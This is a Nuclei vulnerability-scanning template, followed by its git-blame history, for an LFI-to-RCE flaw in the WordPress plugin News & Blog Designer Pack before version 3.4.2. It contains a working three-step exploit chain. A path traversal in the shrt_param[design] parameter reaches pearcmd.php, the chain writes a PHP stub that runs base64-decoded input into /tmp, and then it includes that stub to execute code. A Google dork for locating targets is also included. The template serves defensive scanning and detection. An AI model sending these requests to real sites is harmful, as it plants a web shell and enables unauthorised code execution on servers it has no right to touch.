nuclei-templates/http/vulnerabilities/wordpress/blog-designer-pack-rce.yaml

id: blog-designer-pack-rce

info:
  name: News & Blog Designer Pack < 3.4.2 - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    News & Blog Designer Pack contains a local file inclusion vulnerability via user controlled $design variable extracted by POST parameter 'shrt_param' leading to Remote Code Execution via pearcmd.php. The vulnerability occurs within bdp_get_more_post function inside file bdp-ajax-functions.php.
  reference:
    - https://twitter.com/frycos/status/1717571552470819285
    - https://wordpress.org/plugins/blog-designer-pack/
  metadata:
    google-query: inurl:"/wp-content/plugins/blog-designer-pack/"
    verified: true
  tags: wordpress,wp-plugin,lfi,wp,blogdesignerpack,rce,intrusive

variables:
  randomstr: "{{randstr_1}}"
  marker: "{{base64(randomstr)}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bdp_get_more_post

      - |
        POST /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &action=bdp_get_more_post&shrt_param[design]=../../../../../../../../usr/local/lib/php/pearcmd

      - |
        POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        &action=bdp_get_more_post&shrt_param[design]=../../../../../../../../tmp/{{randstr}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "\"success\":0")'
          - 'contains(body_2,"channel pear.php.net")'
          - 'contains_all(body_3, "{{randomstr}}", "success\":1")'
          - 'contains(header_3, "application/json")'
        condition: and
# digest: 4a0a0047304502207c2f6dd08acd1a81e52a6037b98b4fec66c843560546696e39d42554d1573a60022100aec8c457738f2072360d8f5bf70c06deffa21782b34ccab586a8aa5b0b6ae931:922c64590222798bb761d5b6d8e72950
updated matcher & name 2023-10-26 18:11:10 +00:00			`id: blog-designer-pack-rce`
News and blog designer pack - wordpress plugin LFI leading to RCE 2023-10-26 18:01:11 +00:00
			`info:`
updated matcher & name 2023-10-26 18:11:10 +00:00			`name: News & Blog Designer Pack < 3.4.2 - Remote Code Execution`
			`author: iamnoooob,rootxharsh,pdresearch`
News and blog designer pack - wordpress plugin LFI leading to RCE 2023-10-26 18:01:11 +00:00			`severity: critical`
			`description: \|`
			`News & Blog Designer Pack contains a local file inclusion vulnerability via user controlled $design variable extracted by POST parameter 'shrt_param' leading to Remote Code Execution via pearcmd.php. The vulnerability occurs within bdp_get_more_post function inside file bdp-ajax-functions.php.`
			`reference:`
			`- https://twitter.com/frycos/status/1717571552470819285`
added metadata 2023-10-26 18:26:48 +00:00			`- https://wordpress.org/plugins/blog-designer-pack/`
			`metadata:`
			`google-query: inurl:"/wp-content/plugins/blog-designer-pack/"`
			`verified: true`
updated matcher & name 2023-10-26 18:11:10 +00:00			`tags: wordpress,wp-plugin,lfi,wp,blogdesignerpack,rce,intrusive`
News and blog designer pack - wordpress plugin LFI leading to RCE 2023-10-26 18:01:11 +00:00
			`variables:`
			`randomstr: "{{randstr_1}}"`
			`marker: "{{base64(randomstr)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /wp-admin/admin-ajax.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=bdp_get_more_post`

			`- \|`
			`POST /wp-admin/admin-ajax.php?+config-create+/&/<?=base64_decode($_GET[0])?>+/tmp/{{randstr}}.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../usr/local/lib/php/pearcmd`

			`- \|`
			`POST /wp-admin/admin-ajax.php?0={{marker}} HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`&action=bdp_get_more_post&shrt_param[design]=../../../../../../../../tmp/{{randstr}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
updated matcher & name 2023-10-26 18:11:10 +00:00			`- 'contains(body_1, "\"success\":0")'`
			`- 'contains(body_2,"channel pear.php.net")'`
			`- 'contains_all(body_3, "{{randomstr}}", "success\":1")'`
			`- 'contains(header_3, "application/json")'`
			`condition: and`
Auto Template Signing [Fri Oct 27 06:32:23 UTC 2023] :robot: 2023-10-27 06:32:23 +00:00			`# digest: 4a0a0047304502207c2f6dd08acd1a81e52a6037b98b4fec66c843560546696e39d42554d1573a60022100aec8c457738f2072360d8f5bf70c06deffa21782b34ccab586a8aa5b0b6ae931:922c64590222798bb761d5b6d8e72950`